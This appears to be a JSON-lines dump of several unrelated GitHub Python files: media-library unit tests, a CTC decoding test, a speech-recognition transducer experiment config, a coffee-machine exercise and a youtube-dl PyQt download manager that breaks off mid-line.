self.sandbox.source_videos_library,\n file_path\n )\n\n def test_ignore_txt_in_backup_video_library(self):\n file_path = self.sandbox.make_media(\n 'ignore_me.txt',\n 'foo',\n self.sandbox.backup_videos_library\n )\n LibraryTestMethods().ignored_file_extensions(\n self.sandbox.backup_videos_library,\n file_path\n )\n\nclass LibraryTestMethods(unittest.TestCase):\n # Re-usable methods\n\n def init_library(self, mock_library: sandbox.MockLibrary):\n # Make a Library object\n library_object = library.Library(mock_library.name, mock_library.path, mock_library.source)\n\n # Assert default properties are as expected\n self.assertEqual(library_object.name, mock_library.name)\n self.assertEqual(library_object.path, mock_library.path)\n self.assertEqual(library_object.source, mock_library.source)\n self.assertEqual(len(library_object.media), 0)\n\n def load_all_media(self, mock_library: sandbox.MockLibrary, media_in_library: list):\n # Make a Library object\n library_object = library.Library(mock_library.name, mock_library.path, mock_library.source)\n\n # Load all media and assert all media were found\n self.assertTrue(library_object.load_all_media(callback_on_progress=None))\n self.assertEqual(len(media_in_library), len(library_object.media))\n\n # Load all media again; assert the library's list of media did not change\n library_object.load_all_media(False)\n self.assertEqual(len(media_in_library), len(library_object.media))\n\n # Assert all files were init'd properly\n for media_name in library_object.media:\n # Assert the MediaFile 'path' is the absolute path to the file\n self.assertTrue(library_object.media[media_name].path in [item.path for item in media_in_library])\n\n # Assert the MediaFile 'path_in_library' is the relative path to the file (relative to the library)\n # Note: this is the same code used 
in the current Library().load_all_media() method\n path_in_library = library_object.media[media_name].path.replace(\n library_object.path + os.sep, ''\n )\n self.assertEqual(library_object.media[media_name].path_in_library, path_in_library)\n\n # Assert the MediaFile 'source' is equal to the Library 'source'\n self.assertEqual(library_object.media[media_name].source, library_object.source)\n\n # Remove the video from video_list for the next 'for' iteration\n # to prove the same media is not returned more than once\n media_in_library.remove(list(filter(lambda x: x.name == media_name, media_in_library))[0])\n\n def copy_new_media(self, target_mock_library: sandbox.MockLibrary, other_mock_library: sandbox.MockLibrary):\n # Make a pair of Library objects\n target_library_object = library.Library(target_mock_library.name, target_mock_library.path, target_mock_library.source)\n other_library_object = library.Library(other_mock_library.name, other_mock_library.path, other_mock_library.source)\n\n # Load the Library objects\n target_library_object.load_all_media(callback_on_progress=None)\n other_library_object.load_all_media(callback_on_progress=None)\n\n original_target_media_count = len(target_library_object.media)\n\n # Copy media to 'target' that only exist in 'other'\n # Assert each Library.copy_media() action creates a new MediaFile object in the 'target' library\n copy_count = 0\n for media_name in other_library_object.media:\n if media_name not in target_library_object.media:\n copy_count += 1\n self.assertTrue(\n target_library_object.copy_media(\n other_library_object.media[media_name].path,\n other_library_object.media[media_name].path_in_library,\n other_library_object.media[media_name].real_checksum\n ).success\n )\n\n # Assertions\n self.assertTrue(media_name in target_library_object.media)\n self.assertEqual(\n target_library_object.media[media_name].path_in_library,\n other_library_object.media[media_name].path_in_library\n )\n self.assertTrue(os.path.exists(target_library_object.media[media_name].path))\n self.assertEqual(\n target_library_object.media[media_name].real_checksum,\n other_library_object.media[media_name].real_checksum\n )\n self.assertNotEqual(\n target_library_object.media[media_name].cache_file,\n other_library_object.media[media_name].cache_file\n )\n self.assertEqual(\n target_library_object.media[media_name].cached_checksum,\n other_library_object.media[media_name].cached_checksum\n )\n self.assertEqual(\n target_library_object.media[media_name].cached_date,\n str(datetime.date.today())\n )\n # Verify the above 'for' loop actually copied something\n # Sandbox.populate_library_with_unique_media() adds 12 files\n self.assertEqual(copy_count, 12) # If this fails, the whole test was a dud\n self.assertEqual(len(target_library_object.media), original_target_media_count + copy_count)\n\n def copy_existing_media(self, target_mock_library: sandbox.MockLibrary, other_mock_library: sandbox.MockLibrary):\n # Make a pair of Library objects\n target_library_object = library.Library(target_mock_library.name, target_mock_library.path, target_mock_library.source)\n other_library_object = library.Library(other_mock_library.name, other_mock_library.path, other_mock_library.source)\n\n # Load the Library objects\n target_library_object.load_all_media(False)\n other_library_object.load_all_media(False)\n\n original_target_media_count = len(target_library_object.media)\n\n # Attempt to copy media from 'other' that already exists on the 'target'\n # Assert the file is /not/ 
copied\n copy_count = 0\n for media_name in other_library_object.media:\n if media_name in target_library_object.media:\n copy_count += 1\n target_file_last_modified = os.path.getmtime(target_library_object.media[media_name].path)\n self.assertFalse(\n target_library_object.copy_media(\n other_library_object.media[media_name].path,\n other_library_object.media[media_name].path_in_library,\n other_library_object.media[media_name].real_checksum\n ).success\n )\n self.assertTrue(media_name in target_library_object.media)\n self.assertTrue(os.path.exists(target_library_object.media[media_name].path))\n self.assertEqual(\n target_file_last_modified,\n os.path.getmtime(target_library_object.media[media_name].path)\n )\n\n self.assertEqual(len(target_library_object.media), original_target_media_count)\n\n def delete_media(self, mock_library):\n # Make a Library object\n library_object = library.Library(mock_library.name, mock_library.path, mock_library.source)\n\n # Load the library; assert media were actually found\n library_object.load_all_media(False)\n self.assertEqual(len(library_object.media), 18)\n\n # Generate a cache file for each media in the library\n media_items = []\n for media_name in library_object.media:\n media_items.append((\n media_name,\n library_object.media[media_name].path\n ))\n library_object.media[media_name].cached_checksum\n self.assertTrue(os.path.exists(library_object.media[media_name].cache_file))\n\n # Delete each media and perform assertions\n for media_name, media_path in media_items:\n media_cache_path = library_object.media[media_name].cache_file\n library_object.delete_media(media_name)\n self.assertFalse(os.path.exists(media_path))\n self.assertFalse(os.path.exists(media_cache_path))\n self.assertFalse(media_name in library_object.media)\n\n self.assertEqual(len(library_object.media), 0)\n\n def ignored_file_extensions(self, mock_library, file_to_ignore):\n # Make a Library object\n library_object = library.Library(mock_library.name, mock_library.path, mock_library.source)\n\n # For sanity purposes, make sure the 'file_to_ignore' actually exists under the library\n self.assertTrue(os.path.exists(file_to_ignore.path))\n self.assertIn(library_object.path, file_to_ignore.path)\n\n # Load the library; assert the 'file_to_ignore' was not loaded\n library_object.load_all_media(False)\n self.assertEqual(len(library_object.media), 18)\n self.assertNotIn(\n file_to_ignore.name,\n library_object.media\n )\n","repo_name":"Jack-Edwards/media-backup","sub_path":"tests/models/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":12711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13153728335","text":"import icdiff\nimport numpy as np\n\nfrom ctc_decoding.huggingface_ctc_decoding import (\n HFCTCGreedyDecoder,\n)\nfrom ml4audio.text_processing.asr_metrics import calc_cer\n\nTARGET_SAMPLE_RATE = 16000\n\n\ndef test_GreedyDecoder(\n hfwav2vec2_base_tokenizer,\n librispeech_logtis_file,\n librispeech_ref,\n):\n logits = np.load(librispeech_logtis_file, allow_pickle=True)\n decoder = HFCTCGreedyDecoder(\n tokenizer_name_or_path=\"facebook/wav2vec2-base-960h\",\n ).build()\n transcript = decoder.ctc_decode(logits.squeeze())[0]\n hyp = transcript.text\n\n cer = calc_cer([librispeech_ref], [hyp])\n assert cer == 
0.0\n","repo_name":"SELMA-project/ml4audio","sub_path":"ctc-decoding/tests/test_greedy_decoding.py","file_name":"test_greedy_decoding.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"86"} +{"seq_id":"30900524572","text":"import os\n\nfrom sisyphus import gs, tk\n\nimport i6_core.rasr as rasr\n\nimport i6_experiments.common.setups.rasr.gmm_system as gmm_system\nimport i6_experiments.common.setups.rasr.util as rasr_util\n\nfrom i6_experiments.users.berger.systems.transducer_system import TransducerSystem\nfrom i6_experiments.users.berger.args.jobs.hybrid_args import get_nn_args\nfrom i6_experiments.users.berger.args.jobs.search_types import SearchTypes\nfrom i6_experiments.users.berger.network.models.context_1_transducer import (\n get_viterbi_transducer_alignment_config,\n make_context_1_blstm_transducer_blank,\n make_context_1_blstm_transducer_fullsum,\n make_context_1_blstm_transducer_recog,\n pretrain_construction_algo,\n)\nfrom i6_experiments.users.berger.corpus.sms_wsj.data import get_data_inputs\nfrom i6_experiments.users.berger.args.jobs.rasr_init_args import get_init_args\nfrom i6_experiments.users.berger.args.jobs.data import get_returnn_rasr_data_inputs\nfrom i6_experiments.users.berger.args.returnn.learning_rates import (\n LearningRateSchedules,\n)\nfrom i6_core.returnn.config import CodeWrapper\n\n\n# ********** Settings **********\n\ndir_handle = os.path.dirname(__file__).split(\"config/\")[1]\nfilename_handle = os.path.splitext(os.path.basename(__file__))[0][len(\"config_\") :]\ngs.ALIAS_AND_OUTPUT_SUBDIR = f\"{dir_handle}/{filename_handle}/\"\nrasr.flow.FlowNetwork.default_flags = {\"cache_mode\": \"task_dependent\"}\n\ntrain_key = \"train_si284\"\ndev_key = \"cv_dev93\"\ntest_key = \"test_eval92\"\n\ncv_segments = tk.Path(\"/work/asr4/berger/dependencies/sms_wsj/segments/cv_dev93_16kHz.reduced\")\n\n# Original WER: 4.3\n# viterbi_model = tk.Path(\n# \"/work/asr4/berger/sisyphus_work_dirs/sms_wsj/20220615_dfg_multi_speaker/i6_core/returnn/rasr_training/ReturnnRasrTrainingJob.DzUlhFloyCtK/output/models/epoch.240.index\"\n# )\n# Original WER: 3.3\nviterbi_model = tk.Path(\n \"/work/asr4/berger/sisyphus_work_dirs/sms_wsj/20220615_dfg_multi_speaker/i6_core/returnn/rasr_training/ReturnnRasrTrainingJob.i17PIYLSFkbp/output/models/epoch.230.meta\"\n)\ntrain_alignment = tk.Path(\n \"/work/asr4/berger/dependencies/sms_wsj/alignment/16kHz/train_si284_gmm/alignment.cache.bundle\"\n)\ndev_alignment = tk.Path(\"/work/asr4/berger/dependencies/sms_wsj/alignment/16kHz/cv_dev93_gmm/alignment.cache.bundle\")\n\ngmm_allophones = tk.Path(\n \"/work/asr4/berger/sisyphus_work_dirs/sms_wsj/20220615_dfg_multi_speaker/i6_core/lexicon/allophones/StoreAllophonesJob.74FPxuoluGhv/output/allophones\"\n)\nctc_allophones = tk.Path(\n \"/work/asr4/berger/sisyphus_work_dirs/sms_wsj/20220615_dfg_multi_speaker/i6_core/lexicon/allophones/StoreAllophonesJob.KIW6XeiDZx8T/output/allophones\"\n)\n\nfrequency = 16\n\nf_name = \"gt\"\n\nnum_inputs = 50\nnum_classes = 87\n\n\ndef run_exp(**kwargs):\n max_pool = kwargs.get(\"max_pool\", [1, 2, 2])\n red_fact = 1\n for p in max_pool:\n red_fact *= p\n\n am_args = {\n \"state_tying\": \"monophone-eow\",\n \"states_per_phone\": 1,\n # \"phon_history_length\": 0,\n # \"phon_future_length\": 0,\n \"tdp_scale\": 1.0,\n \"tdp_transition\": (0.0, 0.0, \"infinity\", 0.0),\n \"tdp_silence\": (0.0, 0.0, \"infinity\", 0.0),\n }\n\n # ********** Init args **********\n\n train_data_inputs, 
dev_data_inputs, test_data_inputs = get_data_inputs(\n train_keys=[train_key],\n dev_keys=[dev_key],\n test_keys=[test_key],\n freq=frequency,\n lm_name=\"64k_3gram\",\n recog_lex_name=\"nab-64k\",\n delete_empty_orth=False,\n )\n init_args = get_init_args(sample_rate_kHz=frequency)\n init_args.feature_extraction_args = {\n f_name: init_args.feature_extraction_args[f_name]\n } # only keep fname and discard other features\n\n feature_system = gmm_system.GmmSystem(rasr_binary_path=None)\n feature_system.init_system(\n rasr_init_args=init_args,\n train_data=train_data_inputs,\n dev_data=dev_data_inputs,\n test_data=test_data_inputs,\n )\n feature_system.run([\"extract\"])\n\n # ********** Data inputs **********\n\n nn_data_inputs = get_returnn_rasr_data_inputs(\n train_data_inputs=train_data_inputs,\n cv_data_inputs=dev_data_inputs,\n dev_data_inputs=dev_data_inputs,\n test_data_inputs=test_data_inputs,\n train_cv_pairing=[(train_key, dev_key)],\n feature_flows=feature_system.feature_flows,\n feature_caches=feature_system.feature_caches,\n am_args=am_args,\n train_alignment=train_alignment,\n cv_alignment=dev_alignment,\n cv_segments=cv_segments,\n allophone_file=gmm_allophones,\n )\n\n # ********** Transducer System **********\n\n name = \"_\".join(filter(None, [\"BLSTM_transducer\", kwargs.get(\"name_suffix\", \"\")]))\n\n train_networks = {}\n recog_networks = {}\n\n l2 = kwargs.get(\"l2\", 5e-06)\n dropout = kwargs.get(\"dropout\", 0.1)\n train_blstm_net, train_python_code = make_context_1_blstm_transducer_fullsum(\n num_outputs=num_classes,\n compress_joint_input=kwargs.get(\"compressed_join\", False),\n specaug_args={\n \"max_time_num\": 3,\n \"max_time\": 15,\n \"max_feature_num\": 5,\n \"max_feature\": 5,\n },\n blstm_args={\n \"max_pool\": max_pool,\n \"l2\": l2,\n \"dropout\": dropout,\n \"size\": 400,\n },\n decoder_args={\n \"combination_mode\": \"concat\",\n \"dec_mlp_args\": {\n \"num_layers\": kwargs.get(\"num_dec_layers\", 2),\n \"size\": 800,\n \"l2\": l2,\n \"dropout\": dropout,\n },\n \"joint_mlp_args\": {\n \"num_layers\": kwargs.get(\"num_joint_layers\", 1),\n \"size\": 600,\n \"l2\": l2,\n \"dropout\": dropout,\n },\n },\n )\n\n train_networks[name] = train_blstm_net\n\n recog_blstm_net, recog_python_code = make_context_1_blstm_transducer_recog(\n num_outputs=num_classes,\n blstm_args={\n \"max_pool\": max_pool,\n \"size\": 400,\n },\n decoder_args={\n \"combination_mode\": \"concat\",\n \"dec_mlp_args\": {\n \"num_layers\": kwargs.get(\"num_dec_layers\", 2),\n \"size\": 800,\n },\n \"joint_mlp_args\": {\n \"num_layers\": kwargs.get(\"num_joint_layers\", 1),\n \"size\": 600,\n },\n },\n )\n\n recog_networks[name] = recog_blstm_net\n\n alignment_config = get_viterbi_transducer_alignment_config(red_fact)\n\n num_subepochs = kwargs.get(\"num_subepochs\", 240)\n\n nn_args = get_nn_args(\n train_networks=train_networks,\n recog_networks=recog_networks,\n num_inputs=num_inputs,\n num_outputs=num_classes,\n num_epochs=num_subepochs,\n search_type=SearchTypes.LabelSyncSearch,\n returnn_train_config_args={\n \"extra_python\": train_python_code,\n \"batch_size\": kwargs.get(\"batch_size\", 15000),\n \"accum_grad\": kwargs.get(\"accum_grad\", 1),\n \"grad_noise\": kwargs.get(\"grad_noise\", 0.0),\n \"grad_clip\": kwargs.get(\"grad_clip\", 100.0),\n \"schedule\": kwargs.get(\"schedule\", LearningRateSchedules.OCLR),\n \"peak_lr\": kwargs.get(\"peak_lr\", 1e-5),\n \"const_lr\": kwargs.get(\"const_lr\", 1e-5),\n \"learning_rate\": kwargs.get(\"learning_rate\", 1e-05),\n 
\"min_learning_rate\": 1e-06,\n \"n_steps_per_epoch\": kwargs.get(\"n_steps_per_epoch\", 1100),\n \"use_chunking\": False,\n \"extra_config\": {\n \"preload_from_files\": {\n \"base\": {\n \"init_for_train\": True,\n \"ignore_missing\": True,\n \"filename\": viterbi_model,\n }\n },\n \"train\": {\"reduce_target_factor\": red_fact},\n \"dev\": {\"reduce_target_factor\": red_fact},\n },\n },\n returnn_recog_config_args={\n \"extra_python\": recog_python_code,\n },\n train_args={\"partition_epochs\": 3, \"extra_rasr_config\": alignment_config},\n prior_args={\n \"num_classes\": num_classes,\n \"use_python_control\": False,\n \"extra_rasr_config\": alignment_config,\n \"mem_rqmt\": 6.0,\n },\n recog_args={\n \"epochs\": [num_subepochs] if kwargs.get(\"recog_final_epoch_only\", False) else None,\n \"lm_scales\": kwargs.get(\"lm_scales\", [0.6]),\n \"prior_scales\": kwargs.get(\"prior_scales\", [0.0]),\n \"use_gpu\": True,\n \"label_unit\": \"phoneme\",\n \"add_eow\": True,\n \"allow_blank\": True,\n \"allow_loop\": False,\n \"blank_penalty\": kwargs.get(\"blank_penalty\", 0.0),\n \"recombination_limit\": 1,\n \"label_scorer_type\": \"tf-ffnn-transducer\",\n \"lp\": 15.0,\n \"label_scorer_args\": {\n \"use_prior\": False,\n \"num_classes\": num_classes,\n \"extra_args\": {\n \"blank_label_index\": 0,\n \"context_size\": 1,\n \"max_batch_size\": 256,\n \"reduction_factors\": red_fact,\n \"use_start_label\": True,\n \"start_label_index\": num_classes,\n \"transform_output_negate\": True,\n },\n },\n \"label_tree_args\": {\n \"use_transition_penalty\": False,\n \"skip_silence\": True,\n },\n },\n )\n\n nn_steps = rasr_util.RasrSteps()\n nn_steps.add_step(\"nn\", nn_args)\n nn_steps.add_step(\"nn_recog\", nn_args)\n\n system = TransducerSystem(rasr_binary_path=None)\n system.init_system(\n rasr_init_args=init_args,\n train_data=nn_data_inputs[\"train\"],\n cv_data=nn_data_inputs[\"cv\"],\n dev_data=nn_data_inputs[\"dev\"],\n test_data=nn_data_inputs[\"test\"],\n train_cv_pairing=[(f\"{train_key}.train\", f\"{train_key}.cv\")],\n )\n\n system.run(nn_steps)\n\n\ndef py():\n # OCLR\n # Peak-lr WER\n # 5e-06 4.5\n # 1e-05 4.7\n # 2e-05 4.7\n # -> No improvements\n # Min/Ep: 17 at 5k Batch size\n if False:\n for peak_lr in [5e-06, 1e-05, 2e-05]:\n name_suffix = f\"oclr-{peak_lr}_pool-4\"\n run_exp(\n name_suffix=name_suffix,\n schedule=LearningRateSchedules.OCLR,\n peak_lr=peak_lr,\n max_pool=[1, 2, 2],\n lm_scales=[0.6],\n recog_final_epoch_only=False,\n )\n\n # compressed input\n # Batch WER Min/Ep\n # 5000 4.7 14\n # 7500 4.8 12\n # 15000 4.8 10\n if False:\n for batch_size, accum_grad, n_steps_per_epoch in [\n (5000, 3, 3100),\n (7500, 2, 2000),\n (15000, 1, 1100),\n ]:\n name_suffix = f\"oclr-{peak_lr}_pool-4_compress-joint_bs-{batch_size}\"\n run_exp(\n name_suffix=name_suffix,\n schedule=LearningRateSchedules.OCLR,\n peak_lr=1e-05,\n max_pool=[1, 2, 2],\n lm_scales=[0.6],\n compressed_join=True,\n batch_size=batch_size,\n accum_grad=accum_grad,\n n_steps_per_epoch=n_steps_per_epoch,\n recog_final_epoch_only=False,\n )\n\n # Default parameters change here:\n # Viterbi model WER 4.3 -> 3.7, Dec-size 640 -> 800, Joint-size 1024 -> 600\n\n # Adapted learning rate schedule -> Const into decay\n if True:\n for const_lr in [5e-06, 8e-06, 1e-05, 3e-05, 5e-05, 7e-05, 9e-05, 1e-04, 3e-04]:\n name_suffix = f\"const_decay-{const_lr}_pool-4\"\n run_exp(\n name_suffix=name_suffix,\n schedule=LearningRateSchedules.CONST_DECAY,\n compressed_join=True,\n batch_size=15000,\n accum_grad=1,\n 
n_steps_per_epoch=1100,\n                const_lr=const_lr,\n                max_pool=[1, 2, 2],\n                lm_scales=[0.6],\n                recog_final_epoch_only=False,\n            )\n","repo_name":"rwth-i6/i6_experiments","sub_path":"users/berger/configs/sms_wsj/20220615_dfg_multi_speaker/wsj_16kHz.bak/config_03b_blstm_transducer_fullsum.py","file_name":"config_03b_blstm_transducer_fullsum.py","file_ext":"py","file_size_in_byte":12193,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"86"} +{"seq_id":"18055734272","text":"MENU = {\r\n    \"espresso\": {\r\n        \"ingredients\": {\r\n            \"water\": 50,\r\n            \"milk\": 0,\r\n            \"coffee\": 18,\r\n        },\r\n        \"cost\": 1.5,\r\n    },\r\n    \"latte\": {\r\n        \"ingredients\": {\r\n            \"water\": 200,\r\n            \"milk\": 150,\r\n            \"coffee\": 24,\r\n        },\r\n        \"cost\": 2.5,\r\n    },\r\n    \"cappuccino\": {\r\n        \"ingredients\": {\r\n            \"water\": 250,\r\n            \"milk\": 100,\r\n            \"coffee\": 24,\r\n        },\r\n        \"cost\": 3.0,\r\n    }\r\n}\r\n\r\nresources = {\r\n    \"water\": 300,\r\n    \"milk\": 200,\r\n    \"coffee\": 100,\r\n    \"profit\": 0,\r\n}\r\n\r\n\r\ndef total_sum(quarters, dimes, nickles, pennies):\r\n    total_amount = quarters*0.25 + dimes*0.1 + nickles*0.05 + pennies*0.01\r\n    return total_amount\r\n\r\n\r\ndef report():\r\n    print(f\"Water: {resources['water']}ml\")\r\n    print(f\"Milk: {resources['milk']}ml\")\r\n    print(f\"Coffee: {resources['coffee']}g\")\r\n    print(f\"Money: ${resources['profit']}\")\r\n\r\n\r\ndef is_sufficient(coffee_select):\r\n    if resources[\"water\"] < MENU[coffee_select][\"ingredients\"][\"water\"]:\r\n        print(\"Sorry there is not enough water\")\r\n        return False\r\n    elif resources[\"milk\"] < MENU[coffee_select][\"ingredients\"][\"milk\"]:\r\n        print(\"Sorry there is not enough milk\")\r\n        return False\r\n    elif resources[\"coffee\"] < MENU[coffee_select][\"ingredients\"][\"coffee\"]:\r\n        print(\"Sorry there is not enough coffee\")\r\n        return False\r\n    else:\r\n        return True\r\n\r\n\r\ndef check_transaction(total_amount):\r\n    # use >= so that paying the exact price is accepted\r\n    if total_amount >= MENU[coffee_select][\"cost\"]:\r\n        resources[\"profit\"] += MENU[coffee_select][\"cost\"]\r\n        change_money = total_amount - MENU[coffee_select][\"cost\"]\r\n        # change_money = round(change_money, 2)\r\n        print(\"Here is ${:0.2f} dollars in change.\".format(change_money))\r\n        return True\r\n    else:\r\n        print(\"Sorry that's not enough money. Money refunded.\")\r\n        return False\r\n\r\n\r\ndef make_coffee(coffee_select):\r\n    resources[\"water\"] -= MENU[coffee_select][\"ingredients\"][\"water\"]\r\n    resources[\"milk\"] -= MENU[coffee_select][\"ingredients\"][\"milk\"]\r\n    resources[\"coffee\"] -= MENU[coffee_select][\"ingredients\"][\"coffee\"]\r\n\r\n\r\nflag = True\r\n\r\nwhile flag:\r\n    coffee_select = input(\"What would you like? 
(espresso/latte/cappuccino): \")\r\n\r\n if coffee_select == \"report\":\r\n report()\r\n elif coffee_select == \"off\":\r\n flag = False\r\n else:\r\n #After selection of the coffee we need to check if there is sufficient resource available for that coffee\r\n is_resource_sufficient = is_sufficient(coffee_select)\r\n\r\n if is_resource_sufficient:\r\n # Resolving amount to be paid for the selected coffee\r\n print(\"Please insert coins.\")\r\n quarters = int(input(\"how many quarters?: \"))\r\n dimes = int(input(\"how many dimes?: \"))\r\n nickles = int(input(\"how many nickles?: \"))\r\n pennies = int(input(\"how many pennies?: \"))\r\n\r\n total_amount = total_sum(quarters, dimes, nickles, pennies)\r\n\r\n is_transaction_successful = check_transaction(total_amount)\r\n if is_transaction_successful:\r\n make_coffee(coffee_select)\r\n print(f\"Here is your {coffee_select}. Enjoy!\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"abhishekguptanits/Python100DaysOfCode","sub_path":"day-0/CoffeeMachine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72750834845","text":"from utils import *\nfrom youtube_dl.postprocessor.common import PostProcessor\nfrom youtube_dl.utils import encodeArgument, PostProcessingError\nimport subprocess\nimport os\nfrom shutil import move\n\n\nclass AudioPP(PostProcessor):\n def run(self, information):\n directory, filename = os.path.split(information['filepath'])\n if directory == '':\n directory = os.getcwd()\n outfile = os.path.join(directory, filename)\n print(outfile)\n tempfile = os.path.join(os.getcwd(), 'temp.mp3')\n command = f'ffmpeg -i \"{outfile}\" -acodec copy {tempfile} -y'\n retCode = subprocess.call(encodeArgument(command), shell=True)\n if retCode != 0:\n raise PostProcessingError(\n 'Command returned error code %d' % retCode)\n move(tempfile, outfile)\n return [], information\n\n\nclass MyLogger(object):\n def __init__(self, download_manager):\n self.download_manager = download_manager\n\n def debug(self, msg):\n if '[ffmpeg]' in msg:\n if 'Destination' in msg:\n idx = msg.find('Destination')\n msg = msg[:idx] + '\\n' + msg[idx:]\n if 'Merging formats into' in msg:\n msg = msg[:30] + '\\n' + msg[30:]\n self.download_manager.sig_msg.emit(msg)\n elif 'Deleting' in msg:\n self.download_manager.sig_msg.emit('Deleting Originals')\n else:\n pass\n\n def warning(self, msg):\n pass\n\n def error(self, msg):\n if msg == 'ERROR: requested format not available':\n pass\n elif 'ERROR: unable to download video data' in msg:\n pass\n else:\n self.download_manager.sig_error.emit(msg)\n\n\nclass DownloadManager(QObject):\n \"\"\"\n The Download Manager will be initiated as a new QThread worker consisting of the YouTube-dl objects.\n The signals emitted will be relayed back to the main GUI.\n \"\"\"\n sig_msg = pyqtSignal(str)\n sig_item = pyqtSignal(QStandardItem)\n sig_tProgress = pyqtSignal(int)\n sig_dProgress = pyqtSignal(int)\n sig_error = pyqtSignal(str)\n sig_done = pyqtSignal(int)\n\n def __init__(self, download_tab):\n super().__init__()\n self.__abort = False\n self.download_tab = download_tab\n self.main_window = self.download_tab.main_window\n\n self.logger = MyLogger(self)\n\n # Settings to format the downloader options\n self.proxy = self.main_window.settings.value('proxy') if int(self.main_window.settings.value('proxyChecked')) == 2 else 
None\n self.outtmpl = os.path.join(self.main_window.settings.value('directory'), self.main_window.settings.value('output'))\n self.nooverwrites = False if int(self.main_window.settings.value('overwrite')) == 2 else True\n self.writesubtitles = True if int(self.main_window.settings.value('writesubtitles')) == 2 else False\n self.writeautomaticsub = True if int(self.main_window.settings.value('writeautomaticsub')) == 2 else False\n self.subtitleslangs = self.main_window.settings.value('subtitleslangs')\n if type(self.subtitleslangs) == str:\n self.subtitleslangs = self.subtitleslangs.split(', ')\n if 'zh' in self.subtitleslangs:\n self.subtitleslangs.append('zh-Hans')\n self.subtitleslangs.append('zh-Hant')\n self.keepvideo = True if int(self.main_window.settings.value('keepFiles')) == 2 else False\n self.video_postprocessor = [{'key': 'FFmpegVideoConvertor', 'preferedformat': self.main_window.settings.value('preferredVideos')}] if int(self.main_window.settings.value('convertFormats')) == 2 else None\n self.audio_postprocessor = [{'key': 'FFmpegExtractAudio', 'preferredcodec': self.main_window.settings.value('preferredAudios')}] if int(self.main_window.settings.value('convertFormats')) == 2 else None\n\n self.default_opts = \"\"\"{\n 'proxy': self.proxy,\n 'outtmpl': self.outtmpl,\n 'format': 'best',\n 'postprocessors': self.video_postprocessor,\n 'keepvideo': self.keepvideo,\n 'writesubtitles': self.writesubtitles,\n 'writeautomaticsub': self.writeautomaticsub,\n 'subtitleslangs': self.subtitleslangs,\n 'logger': self.logger,\n 'progress_hooks': [self.progress_hook],\n 'nooverwrites': self.nooverwrites,\n }\"\"\"\n self.default_downloader = YDL(eval(self.default_opts))\n\n video_opts = eval(self.default_opts)\n video_opts['format'] = 'bestvideo+bestaudio'\n video_opts['postprocessors'] = [{'key': 'FFmpegMerger'}]\n video_opts['merge_output_format'] = self.main_window.settings.value('preferredVideos')\n self.ydl_video = YDL(video_opts)\n\n audio_opts = eval(self.default_opts)\n audio_opts['format'] = 'bestaudio/best'\n audio_opts['postprocessors'] = self.audio_postprocessor\n self.ydl_audio = YDL(audio_opts)\n\n self.ydl = []\n selection = self.main_window.Stream.currentText()\n\n if selection == 'Best Quality (Merge)':\n self.ydl.append(self.ydl_video)\n\n if selection == 'Best Quality (Separate)':\n self.ydl.append(self.ydl_video)\n self.ydl.append(self.ydl_audio)\n\n if selection[-1] == 'p':\n ydl_opts = eval(self.default_opts)\n ydl_opts['format'] = 'best[height<={}]'.format(selection[-4:-1])\n downloader = YDL(ydl_opts)\n self.ydl.append(downloader)\n\n if selection == 'Audio Only':\n self.ydl_audio.add_post_processor(AudioPP(None))\n self.ydl.append(self.ydl_audio)\n\n def download(self, downloader, link):\n incomplete = True\n while incomplete:\n try:\n downloader.download([link])\n incomplete = False\n except Exception as e:\n if 'ERROR: unable to download video data' in str(e):\n pass\n else:\n raise e\n\n def start_downloader(self):\n for (i, idx) in enumerate(self.main_window.downloadVideos.selectedIndexes()):\n self.sig_tProgress.emit(i)\n item = idx.model().itemFromIndex(idx)\n self.sig_item.emit(item)\n\n outtmpl = self.outtmpl\n if '%(format_id)s' not in outtmpl:\n idx = outtmpl.find('.%(ext)s')\n outtmpl = outtmpl[:idx] + ' - %(format_id)s.%(ext)s'\n\n if len(item.video_streams) > 0:\n format = ''\n for stream in item.video_streams:\n format += stream + ','\n format = format[:-1]\n\n video_opts = eval(self.default_opts)\n video_opts['format'] = format\n video_opts['outtmpl'] 
= outtmpl\n video_ydl = YDL(video_opts)\n self.download(video_ydl, item.text())\n\n if len(item.audio_streams) > 0:\n format = ''\n for stream in item.audio_streams:\n format += stream + ','\n format = format[:-1]\n\n audio_opts = eval(self.default_opts)\n audio_opts['format'] = format\n audio_opts['outtmpl'] = outtmpl\n audio_opts['postprocessors'] = self.audio_postprocessor\n audio_ydl = YDL(audio_opts)\n self.download(audio_ydl, item.text())\n\n if len(item.video_streams) > 0 or len(item.audio_streams) > 0:\n break\n\n try:\n for downloader in self.ydl:\n self.download(downloader, item.text())\n except Exception as e:\n if str(e) == 'ERROR: requested format not available':\n self.download(self.default_downloader, item.text())\n\n self.sig_dProgress.emit(0)\n self.sig_tProgress.emit(len(self.main_window.downloadVideos.selectedIndexes()))\n self.sig_done.emit(0)\n\n def progress_hook(self, d):\n if d['status'] == 'finished':\n file_tuple = os.path.split(os.path.abspath(d['filename']))\n self.sig_msg.emit('Finished downloading {}'.format(file_tuple[1]))\n if d['status'] == 'downloading':\n p = d['_percent_str']\n p = p.replace('%', '')\n self.sig_dProgress.emit(float(p))\n self.sig_msg.emit('Downloading {} \\n Speed: {}, ETA: {}'.format(d['filename'], d['_speed_str'], d['_eta_str']))\n\n def abort(self):\n if self.__abort:\n return\n self.sig_msg.emit('Aborting Downloads')\n self.__abort = True\n\n\nclass DownloadTab(QWidget):\n display_name = 'Download'\n threads = []\n\n def __init__(self, main_window):\n super().__init__(main_window)\n QThread.currentThread().setObjectName('download_tab')\n self.main_window = main_window\n self.main_window.download_tab = self\n self.init_ui()\n # self.webEngineView.page().setBackgroundColor(Qt.transparent)\n self.show()\n\n def init_ui(self):\n if hasattr(sys, \"_MEIPASS\"):\n datadir = os.path.join(sys._MEIPASS, 'tabs/download.ui')\n else:\n datadir = 